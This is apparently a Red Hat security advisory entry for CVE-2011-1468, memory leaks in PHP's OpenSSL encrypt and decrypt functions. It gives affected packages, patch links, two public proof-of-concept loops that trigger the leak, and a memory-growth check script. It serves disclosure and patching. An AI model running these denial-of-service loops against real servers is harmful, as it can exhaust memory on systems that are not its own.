Common Vulnerabilities and Exposures assigned an identifier CVE-2011-1468 to the following vulnerability:

Multiple memory leaks in the OpenSSL extension in PHP before 5.3.6 might allow remote attackers to cause a denial of service (memory consumption) via (1) plaintext data to the openssl_encrypt function or (2) ciphertext data to the openssl_decrypt function.

References:
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1468
[2] http://bugs.php.net/bug.php?id=54060
[3] http://bugs.php.net/bug.php?id=54061
[4] http://www.php.net/ChangeLog-5.php

Upstream patch:
[6] http://svn.php.net/viewvc/?view=revision&revision=308531
Public PoC from [2]:
====================
<?php
$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
$pass = "r23498rui324hjbnkj";
$maxi = 200000;
$t = microtime(1);
for ($i=0;$i<$maxi; $i++){
    openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2');
}
$t = microtime(1)-$t;
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";
?>

Public PoC from [3]:
====================
<?php
$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
$pass = "r23498rui324hjbnkj";
$maxi = 200000;
$t = microtime(1);
for ($i=0;$i<$maxi; $i++){
    $cr = openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2');
    $dcr = openssl_decrypt($cr, 'des3', $pass, false, '1qazxsw2');
    if ($dcr != $data.$i){
        print "at step $i decryption failed\n";
    }
}
$t = microtime(1)-$t;
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";
?>
This issue did NOT affect the versions of the php package, as shipped with Red Hat Enterprise Linux 4 and 5.

--

This issue affects the version of the php53 package, as shipped with Red Hat Enterprise Linux 5.

This issue affects the version of the php package, as shipped with Red Hat Enterprise Linux 6.

--

This issue does NOT affect the versions of the php package, as shipped with Fedora releases 13 and 14 (the particular package updates have already been scheduled).
The corresponding fix to openssl_decrypt() is: http://svn.php.net/viewvc?view=revision&revision=308534
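A check for whether an installed build still leaks in either function, as an added example (not code from the bug reports or from PHP upstream): it measures resident memory growth, which the timing-only PoCs above do not report. It assumes Linux /proc, the CLI with the openssl extension, constructed plaintext, passphrase and IV values, and a 4096 kB noise threshold.

```php
<?php
// Added example, not code from the bug reports or from PHP upstream.
// PHP 5.3-compatible syntax; assumes Linux /proc and the CLI with ext/openssl.
// Resident set size in kB. RSS is read instead of memory_get_usage() so that
// allocations made outside PHP's own allocator are counted too.
function rss_kb()
{
    $status = @file_get_contents('/proc/self/status');
    if ($status === false || !preg_match('/^VmRSS:\s+(\d+)\s+kB/m', $status, $m)) {
        return null;
    }
    return (int) $m[1];
}

// Calls $fn $iterations times and returns the RSS growth in kB (null if unknown).
function rss_growth_kb($fn, $iterations)
{
    for ($i = 0; $i < 1000; $i++) { $fn($i); }   // warm-up: one-time allocations
    $before = rss_kb();
    for ($i = 0; $i < $iterations; $i++) { $fn($i); }
    $after = rss_kb();
    return ($before === null || $after === null) ? null : $after - $before;
}
// Constructed sample values (not those from the reports); cipher name as reported.
$data = str_repeat('constructed sample plaintext ', 6);
$pass = 'constructed-passphrase';
$iv = '01234567';   // 8 bytes, the des3 block size
$cipher = 'des3';
$ct = openssl_encrypt($data, $cipher, $pass, 0, $iv);
if ($ct === false) { fwrite(STDERR, "cipher $cipher unavailable\n"); exit(2); }
// A fixed ciphertext isolates openssl_decrypt() from the encrypt path.
$cases = array(
    'openssl_encrypt' => function ($i) use ($data, $cipher, $pass, $iv) {
        openssl_encrypt($data . $i, $cipher, $pass, 0, $iv);
    },
    'openssl_decrypt' => function ($i) use ($ct, $cipher, $pass, $iv) {
        openssl_decrypt($ct, $cipher, $pass, 0, $iv);
    },
);
$iterations = 200000;   // loop count used in the reports
$thresholdKb = 4096;    // assumed tolerance for allocator noise
$leak = false;
foreach ($cases as $name => $fn) {
    $growth = rss_growth_kb($fn, $iterations);
    if ($growth === null) { fwrite(STDERR, "cannot read VmRSS\n"); exit(2); }
    printf("%-16s RSS growth: %d kB over %d calls\n", $name, $growth, $iterations);
    $leak = $leak || $growth > $thresholdKb;
}
exit($leak ? 1 : 0);
```

Exit status 1 means growth in at least one function exceeded the threshold; comparing a run before and after installing the updated package shows whether the fix is present regardless of the reported version string.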
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 5
  Red Hat Enterprise Linux 6

Via RHSA-2011:1423 https://rhn.redhat.com/errata/RHSA-2011-1423.html
Statement: Not vulnerable. This issue did not affect the versions of php as shipped with Red Hat Enterprise Linux 4 and 5. It has been addressed in Red Hat Enterprise Linux 5 (php53) and 6 (php).